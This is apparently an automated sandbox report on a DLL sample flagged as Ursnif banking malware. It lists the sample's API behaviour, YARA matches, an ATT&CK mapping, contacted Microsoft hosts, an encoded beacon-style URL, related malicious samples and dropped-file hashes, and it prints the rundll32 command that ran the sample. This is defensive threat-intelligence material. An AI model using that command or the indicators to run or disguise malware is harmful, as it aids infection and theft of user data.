1_2_6E1A36C0

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1E0480 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,

1_2_6E1E0480

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1717FA LoadLibraryA,GetProcAddress,

1_2_6E1717FA

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1E4E20 mov ecx, dword ptr fs:[00000030h]	1_2_6E1E4E20
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1E4CE0 mov ecx, dword ptr fs:[00000030h]	1_2_6E1E4CE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1E4D80 mov ecx, dword ptr fs:[00000030h]	1_2_6E1E4D80
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B7960 mov eax, dword ptr fs:[00000030h]	1_2_6E1B7960
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E23C536 mov eax, dword ptr fs:[00000030h]	1_2_6E23C536
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E23C46C mov eax, dword ptr fs:[00000030h]	1_2_6E23C46C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E23C073 push dword ptr fs:[00000030h]	1_2_6E23C073
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1E4E20 mov ecx, dword ptr fs:[00000030h]	4_2_6E1E4E20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1E4CE0 mov ecx, dword ptr fs:[00000030h]	4_2_6E1E4CE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1E4D80 mov ecx, dword ptr fs:[00000030h]	4_2_6E1E4D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1B7960 mov eax, dword ptr fs:[00000030h]	4_2_6E1B7960
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E23C536 mov eax, dword ptr fs:[00000030h]	4_2_6E23C536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E23C46C mov eax, dword ptr fs:[00000030h]	4_2_6E23C46C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E23C073 push dword ptr fs:[00000030h]	4_2_6E23C073

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1A36C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6E1A36C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B4F60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6E1B4F60
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1A38F0 SetUnhandledExceptionFilter,	1_2_6E1A38F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1A3990 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6E1A3990
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1A36C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6E1A36C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1B4F60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6E1B4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1A38F0 SetUnhandledExceptionFilter,	4_2_6E1A38F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1A3990 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6E1A3990

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.723307341.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.724383239.00000000031B0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.723307341.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.724383239.00000000031B0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.723307341.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.724383239.00000000031B0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000001.00000002.723307341.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.724383239.00000000031B0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_02C92D6E cpuid

4_2_02C92D6E

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E171237 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

1_2_6E171237

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_02C92D6E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

4_2_02C92D6E

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E171CDD CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_6E171CDD

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.662417377.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681209868.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.724251151.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662378098.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662456772.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681069818.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662317153.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681166678.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662182472.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662498468.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681184112.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681198469.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662484640.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681099453.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681146524.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662019943.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681124435.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725706595.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6660, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6700, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.662417377.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681209868.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.724251151.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662378098.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662456772.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681069818.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662317153.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681166678.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662182472.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662498468.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681184112.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681198469.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662484640.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681099453.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681146524.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662019943.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681124435.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725706595.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6660, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6700, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Application Shimming1	Process Injection12	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Application Shimming1	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
609a460e94791.tiff.dll	0%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.2c90000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
1.2.loaddll32.exe.1620000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
outlook.com	40.97.161.50	true	false	high
HHN-efz.ms-acdc.office.com	52.97.201.34	true	false	high
FRA-efz.ms-acdc.office.com	40.101.12.82	true	false	high
www.outlook.com	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://outlook.com/login/greed/gx9NI4Ybpp/8F85m84ndjn4UwJSZ/KFY_2BxmUPMy/coa0QUktAbb/vjBaicl7yvyNDs/NaAVAq9mPnbNTlKz1AUy2/5aIKWQiZNRBNaijS/Tt5Vo5dnaNIMeJI/Piqfb55cpfCEI8CpHK/_2FWICMIW/YUkQnOfGVld1SPd1rTnm/w0s_2F9NNcplFjkZ_2F/ufX9zF863VCJiOMFbmL1SV/K4t8NhPa8Lg/cl7PdmL.gfk	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://outlook.office365.com/login/greed/gx9NI4Ybpp/8F85m84ndjn4UwJSZ/KFY_2BxmUPMy/coa0QUktAbb/vjBa	~DF6A2029352AAD8EB0.TMP.18.dr, {7A4756FC-B284-11EB-90E5-ECF4BB2D2496}.dat.18.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.97.201.34	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.97.161.50	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.101.12.82	FRA-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	410818
Start date:	11.05.2021
Start time:	11:09:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	609a460e94791.tiff.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.winDLL@14/5@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 10.3% (good quality ratio 9.7%) Quality average: 79.1% Quality standard deviation: 29.2%
HCA Information:	Successful, ratio: 64% Number of executed functions: 42 Number of non-executed functions: 155
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Excluded IPs from analysis (whitelisted): 52.147.198.201, 92.122.145.220, 168.61.161.212, 52.255.188.83, 205.185.216.42, 205.185.216.10, 184.30.24.56, 13.64.90.137, 40.126.31.141, 20.190.159.136, 20.190.159.138, 40.126.31.4, 40.126.31.143, 40.126.31.139, 40.126.31.1, 40.126.31.137, 20.50.102.62, 13.88.21.125, 92.122.213.194, 92.122.213.247, 88.221.62.148, 152.199.19.161, 52.155.217.156 Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
52.97.201.34	New%20order%20contract.html	Get hash	malicious	Browse
40.97.161.50	13fil.exe	Get hash	malicious	Browse
	24messag.exe	Get hash	malicious	Browse
	.exe	Get hash	malicious	Browse
	.exe	Get hash	malicious	Browse
	66documen.exe	Get hash	malicious	Browse
	9messag.exe	Get hash	malicious	Browse
40.101.12.82	redwirespace-invoice-982323_xls.HtMl	Get hash	malicious	Browse
	https://user74359648.ts.r.appspot.com/#jodymontgomery@technologyunderstood.com	Get hash	malicious	Browse
	https:\\bit.ly/3bulbTy#eric.tuliao@ibo.org	Get hash	malicious	Browse
	https://iau-maskan.ir	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
outlook.com	file.msg.exe	Get hash	malicious	Browse	104.47.56.138
	Update-KB1484-x86.exe	Get hash	malicious	Browse	104.47.57.138
	n6osajjc938.exe	Get hash	malicious	Browse	104.47.54.36
	9b3d7f02.exe	Get hash	malicious	Browse	104.47.54.36
	5zc9vbGBo3.exe	Get hash	malicious	Browse	52.101.24.0
	InnAcjnAmG.exe	Get hash	malicious	Browse	104.47.53.36
	8X93Tzvd7V.exe	Get hash	malicious	Browse	52.101.24.0
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	104.47.53.36
	SecuriteInfo.com.Mal.GandCrypt-A.24654.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.W32.AIDetect.malware2.29567.exe	Get hash	malicious	Browse	104.47.53.36
	lsass(1).exe	Get hash	malicious	Browse	104.47.59.138
	rtofwqxq.exe	Get hash	malicious	Browse	104.47.53.36
	VufxYArno1.exe	Get hash	malicious	Browse	104.47.53.36
HHN-efz.ms-acdc.office.com	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.150.2
	8OKQ6ogGRx.dll	Get hash	malicious	Browse	40.101.138.2
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	New%20order%20contract.html	Get hash	malicious	Browse	52.98.175.2
FRA-efz.ms-acdc.office.com	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.201.82
	8OKQ6ogGRx.dll	Get hash	malicious	Browse	40.101.81.162
	dechert-Investment078867-xlsx.Html	Get hash	malicious	Browse	52.97.189.66
	murexltd-Investment_265386-xlsx.html	Get hash	malicious	Browse	52.97.188.66
	z2xQEFs54b.exe	Get hash	malicious	Browse	52.97.250.226
	sgs-Investment974041-xlsx.Html	Get hash	malicious	Browse	40.101.19.162
	roccor-invoice-648133_xls.HtMl	Get hash	malicious	Browse	52.97.200.162
	redwirespace-invoice-982323_xls.HtMl	Get hash	malicious	Browse	40.101.12.82
	prismcosec-invoice-647718_xls.HtMl	Get hash	malicious	Browse	40.101.81.130
	E848.tmp.exe	Get hash	malicious	Browse	40.101.81.130
	Payment.html	Get hash	malicious	Browse	52.97.250.194
	Remittance advice.htm	Get hash	malicious	Browse	52.97.250.210
	0G2gue8shl.exe	Get hash	malicious	Browse	52.97.176.2
	February Payroll.xls.htm	Get hash	malicious	Browse	52.97.250.242
	PURCHASE ORDER#34556558.exe	Get hash	malicious	Browse	52.97.200.178
	Proforma Invoice.exe	Get hash	malicious	Browse	52.97.250.210
	E-DEKONT.exe	Get hash	malicious	Browse	52.97.144.178
	DHL Notification -AWB DHL-2021011293002.exe	Get hash	malicious	Browse	52.97.201.82
	DHL DOCS.exe	Get hash	malicious	Browse	40.101.80.2
	ORDER REQUEST.exe	Get hash	malicious	Browse	40.101.121.34

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	iIoO9qC8yj.exe	Get hash	malicious	Browse	13.107.4.50
	qLi9sAxeSm.exe	Get hash	malicious	Browse	204.95.99.243
	f1a5fbd3e946e8db1c18bd1d30d0f8b41a873cbb76769.exe	Get hash	malicious	Browse	20.194.35.6
	tgix.exe	Get hash	malicious	Browse	137.117.64.85
	Protiviti.htm	Get hash	malicious	Browse	52.240.156.143
	hn80vhR3y1.exe	Get hash	malicious	Browse	13.69.222.243
	file.msg.exe	Get hash	malicious	Browse	104.47.56.161
	SCB_MT103_31951R2105050031_200505.PDF.exe	Get hash	malicious	Browse	157.55.136.23
	Windows_Update.exe	Get hash	malicious	Browse	20.52.178.148
	NcLDA3J4Kp.apk	Get hash	malicious	Browse	204.79.197.200
	LIau1wwvy5.exe	Get hash	malicious	Browse	20.43.33.61
	Update-KB1484-x86.exe	Get hash	malicious	Browse	104.47.37.36
	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.201.82
	2f50000.exe	Get hash	malicious	Browse	52.141.33.89
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	EBqJhAymeE.rtf	Get hash	malicious	Browse	157.55.173.72
	QXfU5ZSUpd.exe	Get hash	malicious	Browse	20.194.35.6
	813oo3jeWE.exe	Get hash	malicious	Browse	20.184.2.45
	pog.exe	Get hash	malicious	Browse	40.124.7.222
	8UsA.sh	Get hash	malicious	Browse	20.233.3.158
MICROSOFT-CORP-MSN-AS-BLOCKUS	iIoO9qC8yj.exe	Get hash	malicious	Browse	13.107.4.50
	qLi9sAxeSm.exe	Get hash	malicious	Browse	204.95.99.243
	f1a5fbd3e946e8db1c18bd1d30d0f8b41a873cbb76769.exe	Get hash	malicious	Browse	20.194.35.6
	tgix.exe	Get hash	malicious	Browse	137.117.64.85
	Protiviti.htm	Get hash	malicious	Browse	52.240.156.143
	hn80vhR3y1.exe	Get hash	malicious	Browse	13.69.222.243
	file.msg.exe	Get hash	malicious	Browse	104.47.56.161
	SCB_MT103_31951R2105050031_200505.PDF.exe	Get hash	malicious	Browse	157.55.136.23
	Windows_Update.exe	Get hash	malicious	Browse	20.52.178.148
	NcLDA3J4Kp.apk	Get hash	malicious	Browse	204.79.197.200
	LIau1wwvy5.exe	Get hash	malicious	Browse	20.43.33.61
	Update-KB1484-x86.exe	Get hash	malicious	Browse	104.47.37.36
	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.201.82
	2f50000.exe	Get hash	malicious	Browse	52.141.33.89
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	EBqJhAymeE.rtf	Get hash	malicious	Browse	157.55.173.72
	QXfU5ZSUpd.exe	Get hash	malicious	Browse	20.194.35.6
	813oo3jeWE.exe	Get hash	malicious	Browse	20.184.2.45
	pog.exe	Get hash	malicious	Browse	40.124.7.222
	8UsA.sh	Get hash	malicious	Browse	20.233.3.158

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7A4756FA-B284-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.767330112336001
Encrypted:	false
SSDEEP:	48:IwhGcprYGwpLdjG/ap8nGIpcFmQGvnZpvFkaGocnRqp9F0jGo4gnsn1pm6GWcnzA:rXZAZdD2ZWkJtGAfBeS1Mj6GICKT/NDB
MD5:	156D3CAF9E8A794ADFC20BEF63EEA127
SHA1:	AF7F7711A0A50AC466904AF1088B915D447CC937
SHA-256:	52D1E225E5A48663A4E782CEE505EF4EFCB03B57D86EB1AEAE2BCB514D55FA88
SHA-512:	E5F0BF27719A6BE7C63C2D1976443B37CCE0741EE08096BF7757B7501CDE2EF28B2183CB5DEB5A34B514D5EFD36D40EAD7F4599EAC060613ED12F05C928833C2
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7A4756FC-B284-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27428
Entropy (8bit):	1.864673958093044
Encrypted:	false
SSDEEP:	96:rrZYQ06AHBSYjB/2RWBkMyG2NXLER2NXLnA:rrZYQ06AHkYjB/2RWBkMyG2NbER2NbnA
MD5:	AD45202875B5B3222E4A0FA70E557E36
SHA1:	262462EB28F2EE5AA4AB87168782A3225D7C2766
SHA-256:	322B18772F6CEE64ACF8D3DF9A5B5E189FC5C11ED8113396D3E8A080C6F73F57
SHA-512:	8B4786EDCC10EB81485BB689D2FEAADBECDC52E7DA026E7D6201D77D84D86C5CC368F844FAB8B1AA7E95B7418599A11E63719EFD1F3772E6594F99C69C8C7C48
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.21211232961955
Encrypted:	false
SSDEEP:	3:oVXUXhXf7Tz8JOGXnEXhXf7T4LX+n:o9UXhP7vqEXhP7Su
MD5:	D37E17C754DC8265F6B19F375B3B2A7B
SHA1:	DB6EB0959B70CB613479E0C56B4B298F120A12C5
SHA-256:	98D3B53E62F7515A00599868EC0299B37D4A3F09B2C864023EC62A52CE8A8356
SHA-512:	B0AE75F39E8D1EFB9ED6136F128166053A01E3FE9A971DA55993FBEE36ECCF09D8747E912C1D98D69634454ECD93E29A7546F8ADE9D1B5157052009359C882C8
Malicious:	false
Reputation:	low
Preview:	[2021/05/11 11:12:44.310] Latest deploy version: ..[2021/05/11 11:12:44.310] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF6A2029352AAD8EB0.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39753
Entropy (8bit):	0.5952183110788842
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+lLpY7t2NXLY2NXLk2NXLd:kBqoxKAuqR+lLpY7t2NbY2Nbk2Nbd
MD5:	3332CE02133F1A2B17659763DD9F9ED8
SHA1:	2CCFF0E9B9AC268A48483F244C2549AC30046A95
SHA-256:	9EB41D80206763DADE5A30133DF5EDEBA27E69BAFDFA96FC9C438933A7B93518
SHA-512:	06AD119BF6B0ECF2397AED8527A4BD69057E52365B10129408DFB61DC62C6D8B7CEC88EC54E360CFADC7BAEB785B5652FD27C0F255AEEDD056D66FC5B1C777B7
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF745550B0ECD73E02.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
